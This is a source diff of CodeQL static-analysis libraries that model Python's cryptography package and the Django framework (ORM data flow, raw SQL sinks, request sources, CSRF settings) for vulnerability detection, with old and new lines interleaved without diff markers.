/** Gets a reference to the dncryptor of a Cipher instance using algorithm with `algorithmName`. */
DataFlow::TypeTrackingNode cipherDecryptor(DataFlow::TypeTracker t, string algorithmName) {
t.start() and
result.(DataFlow::MethodCallNode).calls(cipherInstance(algorithmName), "decryptor")
or
exists(DataFlow::TypeTracker t2 | result = cipherDecryptor(t2, algorithmName).track(t2, t))
}
/**
* Gets a reference to the decryptor of a Cipher instance using algorithm with `algorithmName`.
*
* You obtain an decryptor by using the `decryptor()` method on a Cipher instance.
*/
DataFlow::Node cipherDecryptor(string algorithmName) {
cipherDecryptor(DataFlow::TypeTracker::end(), algorithmName).flowsTo(result)
}
/**
@@ -267,11 +194,12 @@ private module CryptographyModel {
string algorithmName;
CryptographyGenericCipherOperation() {
exists(DataFlow::Node object, string method |
object in [cipherEncryptor(algorithmName), cipherDecryptor(algorithmName)] and
method in ["update", "update_into"] and
this.calls(object, method)
)
this =
cipherInstance(algorithmName)
.getMember(["decryptor", "encryptor"])
.getReturn()
.getMember(["update", "update_into"])
.getACall()
}
override Cryptography::CryptographicAlgorithm getAlgorithm() {
@@ -298,9 +226,8 @@ private module CryptographyModel {
}
/** Gets a reference to a Hash instance using algorithm with `algorithmName`. */
private DataFlow::TypeTrackingNode hashInstance(DataFlow::TypeTracker t, string algorithmName) {
t.start() and
exists(DataFlow::CallCfgNode call | result = call |
private API::Node hashInstance(string algorithmName) {
exists(API::CallNode call | result = call.getReturn() |
call =
API::moduleImport("cryptography")
.getMember("hazmat")
@@ -312,13 +239,6 @@ private module CryptographyModel {
call.getArg(0), call.getArgByName("algorithm")
]
)
or
exists(DataFlow::TypeTracker t2 | result = hashInstance(t2, algorithmName).track(t2, t))
}
/** Gets a reference to a Hash instance using algorithm with `algorithmName`. */
DataFlow::Node hashInstance(string algorithmName) {
hashInstance(DataFlow::TypeTracker::end(), algorithmName).flowsTo(result)
}
/**
@@ -328,7 +248,9 @@ private module CryptographyModel {
DataFlow::MethodCallNode {
string algorithmName;
CryptographyGenericHashOperation() { this.calls(hashInstance(algorithmName), "update") }
CryptographyGenericHashOperation() {
this = hashInstance(algorithmName).getMember("update").getACall()
}
override Cryptography::CryptographicAlgorithm getAlgorithm() {
result.matchesName(algorithmName)

View File

@@ -526,8 +526,11 @@ module PrivateDjango {
/** Gets a reference to the `django` module. */
API::Node django() { result = API::moduleImport("django") }
/** DEPRECATED: Alias for `DjangoImpl` */
deprecated module django = DjangoImpl;
/** Provides models for the `django` module. */
module django {
module DjangoImpl {
// -------------------------------------------------------------------------
// django.db
// -------------------------------------------------------------------------
@@ -541,14 +544,17 @@ module PrivateDjango {
DjangoDb() { this = API::moduleImport("django").getMember("db") }
}
/** DEPRECATED: Alias for `DB` */
deprecated module db = DB;
/** Provides models for the `django.db` module. */
module db {
module DB {
/** Gets a reference to the `django.db.connection` object. */
API::Node connection() { result = db().getMember("connection") }
/** A `django.db.connection` is a PEP249 compliant DB connection. */
class DjangoDbConnection extends PEP249::Connection::InstanceSource {
DjangoDbConnection() { this = connection().getAUse() }
DjangoDbConnection() { this = connection().getAnImmediateUse() }
}
// -------------------------------------------------------------------------
@@ -557,15 +563,18 @@ module PrivateDjango {
/** Gets a reference to the `django.db.models` module. */
API::Node models() { result = db().getMember("models") }
/** DEPRECATED: Alias for `Models` */
deprecated module models = Models;
/** Provides models for the `django.db.models` module. */
module models {
module Models {
/**
* Provides models for the `django.db.models.Model` class and subclasses.
*
* See https://docs.djangoproject.com/en/3.1/topics/db/models/.
*/
module Model {
/** Gets a reference to the `flask.views.View` class or any subclass. */
/** Gets a reference to the `django.db.models.Model` class or any subclass. */
API::Node subclassRef() {
result =
API::moduleImport("django")
@@ -573,45 +582,242 @@ module PrivateDjango {
.getMember("models")
.getMember("Model")
.getASubclass*()
or
result =
API::moduleImport("django")
.getMember("db")
.getMember("models")
.getMember("base")
.getMember("Model")
.getASubclass*()
or
result =
API::moduleImport("polymorphic")
.getMember("models")
.getMember("PolymorphicModel")
.getASubclass*()
}
/**
* A source of instances of `django.db.models.Model` class or any subclass, extend this class to model new instances.
*
* This can include instantiations of the class, return values from function
* calls, or a special parameter that will be set when functions are called by an external
* library.
*
* Use the predicate `Model::instance()` to get references to instances of `django.db.models.Model` class or any subclass.
*/
abstract class InstanceSource extends DataFlow::LocalSourceNode {
/** Gets the model class that this is an instance source of. */
abstract API::Node getModelClass();
/** Holds if this instance-source is fetching data from the DB. */
abstract predicate isDbFetch();
}
/** A direct instantiation of `django.db.models.Model` class or any subclass. */
private class ClassInstantiation extends InstanceSource, DataFlow::CallCfgNode {
API::Node modelClass;
ClassInstantiation() {
modelClass = subclassRef() and
this = modelClass.getACall()
}
override API::Node getModelClass() { result = modelClass }
override predicate isDbFetch() { none() }
}
/** A method call on a query-set or manager that returns an instance of a django model. */
private class QuerySetMethod extends InstanceSource, DataFlow::CallCfgNode {
API::Node modelClass;
string methodName;
QuerySetMethod() {
modelClass = subclassRef() and
methodName in ["get", "create", "earliest", "latest", "first", "last"] and
this = [manager(modelClass), querySet(modelClass)].getMember(methodName).getACall()
}
override API::Node getModelClass() { result = modelClass }
override predicate isDbFetch() { not methodName = "create" }
}
/**
* A method call on a query-set or manager that returns a collection
* containing instances of a django model.
*/
class QuerySetMethodInstanceCollection extends DataFlow::CallCfgNode {
API::Node modelClass;
string methodName;
QuerySetMethodInstanceCollection() {
modelClass = subclassRef() and
this = querySetReturningMethod(modelClass, methodName).getACall() and
not methodName in ["none", "datetimes", "dates", "values", "values_list"]
or
// TODO: When we have flow-summaries, we should be able to model `values` and `values_list`
// Potentially by doing `synthetic ===store of list element==> <Model>.objects`, and then
// `.all()` just keeps that content, and `.first()` will do a read step (of the list element).
//
// So for `Model.objects.filter().exclude().first()` we would have
// 1: <Synthetic node for Model> ===store of list element==> Model.objects
// 2: Model.objects ==> Model.objects.filter()
// 3: Model.objects.filter() ==> Model.objects.filter().exclude()
// 4: Model.objects.filter().exclude() ===read of list element==> Model.objects.filter().exclude().first()
//
// This also means that `.none()` could clear contents. Right now we
// think that the result of `Model.objects.none().all()` can contain
// Model objects, but it will be empty due to the `.none()` part. Not
// that this is important, since no-one would need to write
// `.none().all()` code anyway, but it would be cool to be able to model it properly :D
//
//
// The big benefit is for how we could then model `values`/`values_list`. For example,
// `Model.objects.value_list(name, description)` would result in (for the attribute description)
// 0: <Synthetic node for Model> -- [attr description]
// 1: ==> Model.objects [ListElement, attr description]
// 2: ==> .value_list(...) [ListElement, TupleIndex 1]
//
// but for now, we just model a store step directly from the synthetic
// node to the method call.
//
// extra method on query-set/manager that does _not_ return a query-set,
// but a collection of instances.
modelClass = subclassRef() and
methodName in ["iterator", "bulk_create"] and
this = [manager(modelClass), querySet(modelClass)].getMember(methodName).getACall()
}
/** Gets the model class that this is an instance source of. */
API::Node getModelClass() { result = modelClass }
/** Holds if this instance-source is fetching data from the DB. */
predicate isDbFetch() { not methodName = "bulk_create" }
}
/**
* A method call on a query-set or manager that returns a dictionary
* containing instances of a django models as the values.
*/
class QuerySetMethodInstanceDictValue extends DataFlow::CallCfgNode {
API::Node modelClass;
QuerySetMethodInstanceDictValue() {
modelClass = subclassRef() and
this = [manager(modelClass), querySet(modelClass)].getMember("in_bulk").getACall()
}
/** Gets the model class that this is an instance source of. */
API::Node getModelClass() { result = modelClass }
/** Holds if this instance-source is fetching data from the DB. */
predicate isDbFetch() { any() }
}
/**
* Gets a reference to an instance of `django.db.models.Model` class or any subclass,
* where `modelClass` specifies the class.
*/
private DataFlow::TypeTrackingNode instance(DataFlow::TypeTracker t, API::Node modelClass) {
t.start() and
modelClass = result.(InstanceSource).getModelClass()
or
exists(DataFlow::TypeTracker t2 | result = instance(t2, modelClass).track(t2, t))
}
/**
* Gets a reference to an instance of `django.db.models.Model` class or any subclass,
* where `modelClass` specifies the class.
*/
DataFlow::Node instance(API::Node modelClass) {
instance(DataFlow::TypeTracker::end(), modelClass).flowsTo(result)
}
}
/**
* Gets a reference to the Manager (django.db.models.Manager) for a django Model,
* accessed by `<ModelName>.objects`.
* Provides models for the `django.db.models.FileField` class and `ImageField` subclasses.
*
* See
* - https://docs.djangoproject.com/en/3.1/ref/models/fields/#django.db.models.FileField
* - https://docs.djangoproject.com/en/3.1/ref/models/fields/#django.db.models.ImageField
*/
API::Node manager() { result = Model::subclassRef().getMember("objects") }
module FileField {
/** Gets a reference to the `django.db.models.FileField` or the `django.db.models.ImageField` class or any subclass. */
API::Node subclassRef() {
exists(string className | className in ["FileField", "ImageField"] |
// commonly used alias
result =
API::moduleImport("django")
.getMember("db")
.getMember("models")
.getMember(className)
.getASubclass*()
or
// actual class definition
result =
API::moduleImport("django")
.getMember("db")
.getMember("models")
.getMember("fields")
.getMember("files")
.getMember(className)
.getASubclass*()
)
}
}
/**
* Gets a reference to the Manager (django.db.models.Manager) for the django Model `modelClass`,
* accessed by `<modelClass>.objects`.
*/
API::Node manager(API::Node modelClass) {
modelClass = Model::subclassRef() and
result = modelClass.getMember("objects")
}
/**
* Gets a method with `name` that returns a QuerySet.
* This method can originate on a QuerySet or a Manager.
* `modelClass` specifies the django Model that this query-set originates from.
*
* See https://docs.djangoproject.com/en/3.1/ref/models/querysets/
*/
API::Node querySetReturningMethod(string name) {
API::Node querySetReturningMethod(API::Node modelClass, string name) {
name in [
"none", "all", "filter", "exclude", "complex_filter", "union", "intersection",
"difference", "select_for_update", "select_related", "prefetch_related", "order_by",
"distinct", "reverse", "defer", "only", "using", "annotate", "extra", "raw",
"datetimes", "dates", "values", "values_list", "alias"
] and
result = [manager(), querySet()].getMember(name)
result = [manager(modelClass), querySet(modelClass)].getMember(name)
or
name = "get_queryset" and
result = manager(modelClass).getMember(name)
}
/**
* Gets a reference to a QuerySet (django.db.models.query.QuerySet).
* `modelClass` specifies the django Model that this query-set originates from.
*
* See https://docs.djangoproject.com/en/3.1/ref/models/querysets/
*/
API::Node querySet() { result = querySetReturningMethod(_).getReturn() }
API::Node querySet(API::Node modelClass) {
result = querySetReturningMethod(modelClass, _).getReturn()
}
/** Gets a reference to the `django.db.models.expressions` module. */
API::Node expressions() { result = models().getMember("expressions") }
/** DEPRECATED: Alias for `Expressions` */
deprecated module expressions = Expressions;
/** Provides models for the `django.db.models.expressions` module. */
module expressions {
/** Provides models for the `django.db.models.expressions.RawSQL` class. */
module RawSQL {
module Expressions {
/** Provides models for the `django.db.models.expressions.RawSql` class. */
module RawSql {
/**
* Gets an reference to the `django.db.models.expressions.RawSQL` class.
*/
@@ -644,6 +850,169 @@ module PrivateDjango {
instance(DataFlow::TypeTracker::end(), sql).flowsTo(result)
}
}
/** DEPRECATED: Alias for RawSql */
deprecated module RawSQL = RawSql;
}
/** This internal module provides data-flow modeling of Django ORM. */
private module OrmDataflow {
private import semmle.python.dataflow.new.internal.DataFlowPrivate::Orm
/** Gets the (AST) class of the Django model class `modelClass`. */
Class getModelClassClass(API::Node modelClass) {
result.getParent() = modelClass.getAnImmediateUse().asExpr() and
modelClass = Model::subclassRef()
}
/** A synthetic node representing the data for an Django ORM model saved in a DB. */
class SyntheticDjangoOrmModelNode extends SyntheticOrmModelNode {
API::Node modelClass;
SyntheticDjangoOrmModelNode() { this.getClass() = getModelClassClass(modelClass) }
/** Gets the API node for this Django model class. */
API::Node getModelClass() { result = modelClass }
}
/**
* Gets a synthetic node where the data in the attribute `fieldName` can flow
* to, when a DB store is made on `subModel`, taking ORM inheritance into
* account.
*
* If `fieldName` is defined in class `base`, the results will include the
* synthetic node for `base` itself, the synthetic node for `subModel`, as
* well as all the classes in-between (in the class hierarchy).
*/
SyntheticDjangoOrmModelNode nodeToStoreIn(API::Node subModel, string fieldName) {
exists(Class base, API::Node baseModel, API::Node resultModel |
baseModel = Model::subclassRef() and
resultModel = Model::subclassRef() and
baseModel.getASubclass*() = subModel and
base = getModelClassClass(baseModel) and
exists(Variable v |
base.getBody().getAnItem().(AssignStmt).defines(v) and
v.getId() = fieldName
)
|
baseModel.getASubclass*() = resultModel and
resultModel.getASubclass*() = subModel and
result.getModelClass() = resultModel
)
}
/**
* Gets the synthetic node where data could be loaded from, when a fetch is
* made on `modelClass`.
*
* In vanilla Django inheritance, this is simply the model itself, but if a
* model is based on `polymorphic.models.PolymorphicModel`, a fetch of the
* base-class can also yield instances of its subclasses.
*/
SyntheticDjangoOrmModelNode nodeToLoadFrom(API::Node modelClass) {
result.getModelClass() = modelClass
or
exists(API::Node polymorphicModel |
polymorphicModel =
API::moduleImport("polymorphic").getMember("models").getMember("PolymorphicModel")
|
polymorphicModel.getASubclass+() = modelClass and
modelClass.getASubclass+() = result.getModelClass()
)
}
/** Additional data-flow steps for Django ORM models. */
class DjangOrmSteps extends AdditionalOrmSteps {
override predicate storeStep(
DataFlow::Node nodeFrom, DataFlow::Content c, DataFlow::Node nodeTo
) {
// attribute value from constructor call -> object created
exists(DataFlow::CallCfgNode call, string fieldName |
// Note: Currently only supports kwargs, which should by far be the most
// common way to do things. We _should_ investigate how often
// positional-args are used.
call = Model::subclassRef().getACall() and
nodeFrom = call.getArgByName(fieldName) and
c.(DataFlow::AttributeContent).getAttribute() = fieldName and
nodeTo = call
)
or
// attribute store in `<Model>.objects.create`, `get_or_create`, and `update_or_create`
// see https://docs.djangoproject.com/en/4.0/ref/models/querysets/#create
// see https://docs.djangoproject.com/en/4.0/ref/models/querysets/#get-or-create
// see https://docs.djangoproject.com/en/4.0/ref/models/querysets/#update-or-create
// TODO: This does currently not handle values passed in the `defaults` dictionary
exists(
DataFlow::CallCfgNode call, API::Node modelClass, string fieldName,
string methodName
|
modelClass = Model::subclassRef() and
methodName in ["create", "get_or_create", "update_or_create"] and
call = modelClass.getMember("objects").getMember(methodName).getACall() and
nodeFrom = call.getArgByName(fieldName) and
c.(DataFlow::AttributeContent).getAttribute() = fieldName and
(
// -> object created
(
methodName = "create" and nodeTo = call
or
// TODO: for these two methods, the result is a tuple `(<Model>, bool)`,
// which we need flow-summaries to model properly
methodName in ["get_or_create", "update_or_create"] and none()
)
or
// -> DB store on synthetic node
nodeTo = nodeToStoreIn(modelClass, fieldName)
)
)
or
// attribute store in `<Model>.objects.[<QuerySet>].update()` -> synthetic
// see https://docs.djangoproject.com/en/4.0/ref/models/querysets/#update
exists(DataFlow::CallCfgNode call, API::Node modelClass, string fieldName |
call = [manager(modelClass), querySet(modelClass)].getMember("update").getACall() and
nodeFrom = call.getArgByName(fieldName) and
c.(DataFlow::AttributeContent).getAttribute() = fieldName and
nodeTo = nodeToStoreIn(modelClass, fieldName)
)
or
// synthetic -> method-call that returns collection of ORM models (all/filter/...)
exists(API::Node modelClass |
nodeFrom = nodeToLoadFrom(modelClass) and
nodeTo.(Model::QuerySetMethodInstanceCollection).getModelClass() = modelClass and
nodeTo.(Model::QuerySetMethodInstanceCollection).isDbFetch() and
c instanceof DataFlow::ListElementContent
)
or
// synthetic -> method-call that returns dictionary with ORM models as values
exists(API::Node modelClass |
nodeFrom = nodeToLoadFrom(modelClass) and
nodeTo.(Model::QuerySetMethodInstanceDictValue).getModelClass() = modelClass and
nodeTo.(Model::QuerySetMethodInstanceDictValue).isDbFetch() and
c instanceof DataFlow::DictionaryElementAnyContent
)
}
override predicate jumpStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) {
// save -> synthetic
exists(API::Node modelClass, DataFlow::MethodCallNode saveCall |
// TODO: The `nodeTo` should be restricted more, such that flow to
// base-classes are only for the fields that are defined in the
// base-class... but only passing on flow for a specific attribute requires flow-summaries,
// so we can do
// `obj (in obj.save call) ==read of attr==> synthetic attr on base-class ==store of attr==> synthetic for base-class`
nodeTo = nodeToStoreIn(modelClass, _) and
saveCall.calls(Model::instance(modelClass), "save") and
nodeFrom = saveCall.getObject()
)
or
// synthetic -> method-call that returns single ORM model (get/first/...)
exists(API::Node modelClass |
nodeFrom = nodeToLoadFrom(modelClass) and
nodeTo.(Model::InstanceSource).getModelClass() = modelClass and
nodeTo.(Model::InstanceSource).isDbFetch()
)
}
}
}
}
}
@@ -659,8 +1028,8 @@ module PrivateDjango {
DataFlow::Node sql;
ObjectsAnnotate() {
this = django::db::models::querySetReturningMethod("annotate").getACall() and
django::db::models::expressions::RawSQL::instance(sql) in [
this = DjangoImpl::DB::Models::querySetReturningMethod(_, "annotate").getACall() and
DjangoImpl::DB::Models::Expressions::RawSql::instance(sql) in [
this.getArg(_), this.getArgByName(_)
]
}
@@ -677,8 +1046,8 @@ module PrivateDjango {
DataFlow::Node sql;
ObjectsAlias() {
this = django::db::models::querySetReturningMethod("alias").getACall() and
django::db::models::expressions::RawSQL::instance(sql) in [
this = DjangoImpl::DB::Models::querySetReturningMethod(_, "alias").getACall() and
DjangoImpl::DB::Models::Expressions::RawSql::instance(sql) in [
this.getArg(_), this.getArgByName(_)
]
}
@@ -694,7 +1063,7 @@ module PrivateDjango {
* - https://docs.djangoproject.com/en/3.1/ref/models/querysets/#raw
*/
private class ObjectsRaw extends SqlExecution::Range, DataFlow::CallCfgNode {
ObjectsRaw() { this = django::db::models::querySetReturningMethod("raw").getACall() }
ObjectsRaw() { this = DjangoImpl::DB::Models::querySetReturningMethod(_, "raw").getACall() }
override DataFlow::Node getSql() { result = this.getArg(0) }
}
@@ -705,7 +1074,9 @@ module PrivateDjango {
* See https://docs.djangoproject.com/en/3.1/ref/models/querysets/#extra
*/
private class ObjectsExtra extends SqlExecution::Range, DataFlow::CallCfgNode {
ObjectsExtra() { this = django::db::models::querySetReturningMethod("extra").getACall() }
ObjectsExtra() {
this = DjangoImpl::DB::Models::querySetReturningMethod(_, "extra").getACall()
}
override DataFlow::Node getSql() {
result in [
@@ -720,8 +1091,11 @@ module PrivateDjango {
/** Gets a reference to the `django.urls` module. */
API::Node urls() { result = django().getMember("urls") }
/** DEPRECATED: Alias for `Urls` */
deprecated module urls = Urls;
/** Provides models for the `django.urls` module */
module urls {
module Urls {
/**
* Gets a reference to the `django.urls.path` function.
* See https://docs.djangoproject.com/en/3.0/ref/urls/#path
@@ -741,10 +1115,16 @@ module PrivateDjango {
/** Gets a reference to the `django.conf` module. */
API::Node conf() { result = django().getMember("conf") }
/** DEPRECATED: Alias for `Conf` */
deprecated module conf = Conf;
/** Provides models for the `django.conf` module */
module conf {
module Conf {
/** DEPRECATED: Alias for `ConfUrls` */
deprecated module conf_urls = ConfUrls;
/** Provides models for the `django.conf.urls` module */
module conf_urls {
module ConfUrls {
// -------------------------------------------------------------------------
// django.conf.urls
// -------------------------------------------------------------------------
@@ -767,16 +1147,22 @@ module PrivateDjango {
/** Gets a reference to the `django.http` module. */
API::Node http() { result = django().getMember("http") }
/** DEPRECATED: Alias for `Http` */
deprecated module http = Http;
/** Provides models for the `django.http` module */
module http {
module Http {
// ---------------------------------------------------------------------------
// django.http.request
// ---------------------------------------------------------------------------
/** Gets a reference to the `django.http.request` module. */
API::Node request() { result = http().getMember("request") }
/** DEPRECATED: Alias for `Request` */
deprecated module request = Request;
/** Provides models for the `django.http.request` module. */
module request {
module Request {
/**
* Provides models for the `django.http.request.HttpRequest` class
*
@@ -857,7 +1243,7 @@ module PrivateDjango {
// special handling of the `build_absolute_uri` method, see
// https://docs.djangoproject.com/en/3.0/ref/request-response/#django.http.HttpRequest.build_absolute_uri
exists(DataFlow::AttrRead attr, DataFlow::CallCfgNode call, DataFlow::Node instance |
instance = django::http::request::HttpRequest::instance() and
instance = DjangoImpl::Http::Request::HttpRequest::instance() and
attr.getObject() = instance
|
attr.getAttributeName() = "build_absolute_uri" and
@@ -934,8 +1320,11 @@ module PrivateDjango {
/** Gets a reference to the `django.http.response` module. */
API::Node response() { result = http().getMember("response") }
/** DEPRECATED: Alias for `Response` */
deprecated module response = Response;
/** Provides models for the `django.http.response` module */
module response {
module Response {
/**
* Provides models for the `django.http.response.HttpResponse` class
*
@@ -1669,17 +2058,17 @@ module PrivateDjango {
/** Gets a reference to the `django.http.response.HttpResponse.write` function. */
private DataFlow::TypeTrackingNode write(
django::http::response::HttpResponse::InstanceSource instance, DataFlow::TypeTracker t
DjangoImpl::Http::Response::HttpResponse::InstanceSource instance, DataFlow::TypeTracker t
) {
t.startInAttr("write") and
instance = django::http::response::HttpResponse::instance() and
instance = DjangoImpl::Http::Response::HttpResponse::instance() and
result = instance
or
exists(DataFlow::TypeTracker t2 | result = write(instance, t2).track(t2, t))
}
/** Gets a reference to the `django.http.response.HttpResponse.write` function. */
DataFlow::Node write(django::http::response::HttpResponse::InstanceSource instance) {
DataFlow::Node write(DjangoImpl::Http::Response::HttpResponse::InstanceSource instance) {
write(instance, DataFlow::TypeTracker::end()).flowsTo(result)
}
@@ -1689,7 +2078,7 @@ module PrivateDjango {
* See https://docs.djangoproject.com/en/3.1/ref/request-response/#django.http.HttpResponse.write
*/
class HttpResponseWriteCall extends HTTP::Server::HttpResponse::Range, DataFlow::CallCfgNode {
django::http::response::HttpResponse::InstanceSource instance;
DjangoImpl::Http::Response::HttpResponse::InstanceSource instance;
HttpResponseWriteCall() { this.getFunction() = write(instance) }
@@ -1710,7 +2099,7 @@ module PrivateDjango {
class DjangoResponseSetCookieCall extends HTTP::Server::CookieWrite::Range,
DataFlow::MethodCallNode {
DjangoResponseSetCookieCall() {
this.calls(django::http::response::HttpResponse::instance(), "set_cookie")
this.calls(DjangoImpl::Http::Response::HttpResponse::instance(), "set_cookie")
}
override DataFlow::Node getHeaderArg() { none() }
@@ -1730,7 +2119,7 @@ module PrivateDjango {
class DjangoResponseDeleteCookieCall extends HTTP::Server::CookieWrite::Range,
DataFlow::MethodCallNode {
DjangoResponseDeleteCookieCall() {
this.calls(django::http::response::HttpResponse::instance(), "delete_cookie")
this.calls(DjangoImpl::Http::Response::HttpResponse::instance(), "delete_cookie")
}
override DataFlow::Node getHeaderArg() { none() }
@@ -1757,7 +2146,7 @@ module PrivateDjango {
this.asCfgNode() = subscript
|
cookieLookup.getAttributeName() = "cookies" and
cookieLookup.getObject() = django::http::response::HttpResponse::instance() and
cookieLookup.getObject() = DjangoImpl::Http::Response::HttpResponse::instance() and
exists(DataFlow::Node subscriptObj |
subscriptObj.asCfgNode() = subscript.getObject()
|
@@ -1783,8 +2172,11 @@ module PrivateDjango {
/** Gets a reference to the `django.shortcuts` module. */
API::Node shortcuts() { result = django().getMember("shortcuts") }
/** DEPRECATED: Alias for `Shortcuts` */
deprecated module shortcuts = Shortcuts;
/** Provides models for the `django.shortcuts` module */
module shortcuts {
module Shortcuts {
/**
* Gets a reference to the `django.shortcuts.redirect` function
*
@@ -1802,7 +2194,9 @@ module PrivateDjango {
* thereby handling user input.
*/
class DjangoFormClass extends Class, SelfRefMixin {
DjangoFormClass() { this.getABase() = Django::Forms::Form::subclassRef().getAUse().asExpr() }
DjangoFormClass() {
this.getParent() = Django::Forms::Form::subclassRef().getAnImmediateUse().asExpr()
}
}
/**
@@ -1835,7 +2229,7 @@ module PrivateDjango {
*/
class DjangoFormFieldClass extends Class {
DjangoFormFieldClass() {
this.getABase() = Django::Forms::Field::subclassRef().getAUse().asExpr()
this.getParent() = Django::Forms::Field::subclassRef().getAnImmediateUse().asExpr()
}
}
@@ -1862,7 +2256,8 @@ module PrivateDjango {
// routing modeling
// ---------------------------------------------------------------------------
/**
* In order to recognize a class as being a django view class, based on the `as_view`
* A class that may be a django view class. In order to recognize a class as being a django view class,
* based on the `as_view`
* call, we need to be able to track such calls on _any_ class. This is provided by
* the member predicates of this QL class.
*
@@ -1873,7 +2268,7 @@ module PrivateDjango {
/** Gets a reference to this class. */
private DataFlow::TypeTrackingNode getARef(DataFlow::TypeTracker t) {
t.start() and
result.asExpr().(ClassExpr) = this.getParent()
result.asExpr() = this.getParent()
or
exists(DataFlow::TypeTracker t2 | result = this.getARef(t2).track(t2, t))
}
@@ -1937,7 +2332,7 @@ module PrivateDjango {
*/
class DjangoViewClassFromSuperClass extends DjangoViewClass {
DjangoViewClassFromSuperClass() {
this.getABase() = Django::Views::View::subclassRef().getAUse().asExpr()
this.getParent() = Django::Views::View::subclassRef().getAnImmediateUse().asExpr()
}
}
@@ -1973,7 +2368,7 @@ module PrivateDjango {
/** Provides a class for modeling new django route handlers. */
module DjangoRouteHandler {
/**
* Extend this class to model new APIs. If you want to refine existing API models,
* A django route handler. Extend this class to model new APIs. If you want to refine existing API models,
* extend `DjangoRouteHandler` instead.
*/
abstract class Range extends Function { }
@@ -2059,7 +2454,7 @@ module PrivateDjango {
* See https://docs.djangoproject.com/en/3.0/ref/urls/#path
*/
private class DjangoUrlsPathCall extends DjangoRouteSetup, DataFlow::CallCfgNode {
DjangoUrlsPathCall() { this = django::urls::path().getACall() }
DjangoUrlsPathCall() { this = DjangoImpl::Urls::path().getACall() }
override DataFlow::Node getUrlPatternArg() {
result in [this.getArg(0), this.getArgByName("route")]
@@ -2142,7 +2537,7 @@ module PrivateDjango {
*/
private class DjangoUrlsRePathCall extends DjangoRegexRouteSetup, DataFlow::CallCfgNode {
DjangoUrlsRePathCall() {
this = django::urls::re_path().getACall() and
this = DjangoImpl::Urls::re_path().getACall() and
// `django.conf.urls.url` (which we support directly with
// `DjangoConfUrlsUrlCall`), is implemented in Django 2+ as backward compatibility
// using `django.urls.re_path`. See
@@ -2172,7 +2567,7 @@ module PrivateDjango {
* See https://docs.djangoproject.com/en/1.11/ref/urls/#django.conf.urls.url
*/
private class DjangoConfUrlsUrlCall extends DjangoRegexRouteSetup, DataFlow::CallCfgNode {
DjangoConfUrlsUrlCall() { this = django::conf::conf_urls::url().getACall() }
DjangoConfUrlsUrlCall() { this = DjangoImpl::Conf::ConfUrls::url().getACall() }
override DataFlow::Node getUrlPatternArg() {
result in [this.getArg(0), this.getArgByName("regex")]
@@ -2185,7 +2580,7 @@ module PrivateDjango {
// HttpRequest taint modeling
// ---------------------------------------------------------------------------
/** A parameter that will receive the django `HttpRequest` instance when a request handler is invoked. */
private class DjangoRequestHandlerRequestParam extends django::http::request::HttpRequest::InstanceSource,
private class DjangoRequestHandlerRequestParam extends DjangoImpl::Http::Request::HttpRequest::InstanceSource,
RemoteFlowSource::Range, DataFlow::ParameterNode {
DjangoRequestHandlerRequestParam() {
this.getParameter() = any(DjangoRouteSetup setup).getARequestHandler().getRequestParam()
@@ -2202,7 +2597,7 @@ module PrivateDjango {
*
* See https://docs.djangoproject.com/en/3.1/topics/class-based-views/generic-display/#dynamic-filtering
*/
private class DjangoViewClassRequestAttributeRead extends django::http::request::HttpRequest::InstanceSource,
private class DjangoViewClassRequestAttributeRead extends DjangoImpl::Http::Request::HttpRequest::InstanceSource,
RemoteFlowSource::Range, DataFlow::Node {
DjangoViewClassRequestAttributeRead() {
exists(DataFlow::AttrRead read | this = read |
@@ -2236,6 +2631,36 @@ module PrivateDjango {
}
}
/**
* A parameter that accepts the filename used to upload a file. This is the second
* parameter in functions used for the `upload_to` argument to a `FileField`.
*
* Note that the value this parameter accepts cannot contain a slash. Even when
* forcing the filename to contain a slash when sending the request, django does
* something like `input_filename.split("/")[-1]` (so other special characters still
* allowed). This also means that although the return value from `upload_to` is used
* to construct a path, path injection is not possible.
*
* See
* - https://docs.djangoproject.com/en/3.1/ref/models/fields/#django.db.models.FileField.upload_to
* - https://docs.djangoproject.com/en/3.1/topics/http/file-uploads/#handling-uploaded-files-with-a-model
*/
private class DjangoFileFieldUploadToFunctionFilenameParam extends RemoteFlowSource::Range,
DataFlow::ParameterNode {
DjangoFileFieldUploadToFunctionFilenameParam() {
exists(DataFlow::CallCfgNode call, DataFlow::Node uploadToArg, Function func |
this.getParameter() = func.getArg(1) and
call = DjangoImpl::DB::Models::FileField::subclassRef().getACall() and
uploadToArg in [call.getArg(2), call.getArgByName("upload_to")] and
uploadToArg = poorMansFunctionTracker(func)
)
}
override string getSourceType() {
result = "django filename parameter to function used in FileField.upload_to"
}
}
// ---------------------------------------------------------------------------
// django.shortcuts.redirect
// ---------------------------------------------------------------------------
@@ -2249,7 +2674,7 @@ module PrivateDjango {
*/
private class DjangoShortcutsRedirectCall extends HTTP::Server::HttpRedirectResponse::Range,
DataFlow::CallCfgNode {
DjangoShortcutsRedirectCall() { this = django::shortcuts::redirect().getACall() }
DjangoShortcutsRedirectCall() { this = DjangoImpl::Shortcuts::redirect().getACall() }
/**
* Gets the data-flow node that specifies the location of this HTTP redirect response.
@@ -2313,4 +2738,67 @@ module PrivateDjango {
.getAnImmediateUse()
}
}
// ---------------------------------------------------------------------------
// Settings
// ---------------------------------------------------------------------------
/**
* A custom middleware stack
*/
private class DjangoSettingsMiddlewareStack extends HTTP::Server::CsrfProtectionSetting::Range {
List list;
DjangoSettingsMiddlewareStack() {
this.asExpr() = list and
// we look for an assignment to the `MIDDLEWARE` setting
exists(DataFlow::Node mw |
mw.asVar().getName() = "MIDDLEWARE" and
DataFlow::localFlow(this, mw)
|
// To only include results where CSRF protection matters, we only care about CSRF
// protection when the django authentication middleware is enabled.
// Since an active session cookie is exactly what would allow an attacker to perform
// a CSRF attack.
// Notice that this does not ensure that this is not a FP, since the authentication
// middleware might be unused.
//
// This also strongly implies that `mw` is in fact a Django middleware setting and
// not just a variable named `MIDDLEWARE`.
list.getAnElt().(StrConst).getText() =
"django.contrib.auth.middleware.AuthenticationMiddleware"
)
}
override boolean getVerificationSetting() {
if
list.getAnElt().(StrConst).getText() in [
"django.middleware.csrf.CsrfViewMiddleware",
// see https://github.com/mozilla/django-session-csrf
"session_csrf.CsrfMiddleware"
]
then result = true
else result = false
}
}
private class DjangoCsrfDecorator extends HTTP::Server::CsrfLocalProtectionSetting::Range {
string decoratorName;
Function function;
DjangoCsrfDecorator() {
decoratorName in ["csrf_protect", "csrf_exempt", "requires_csrf_token", "ensure_csrf_cookie"] and
this =
API::moduleImport("django")
.getMember("views")
.getMember("decorators")
.getMember("csrf")
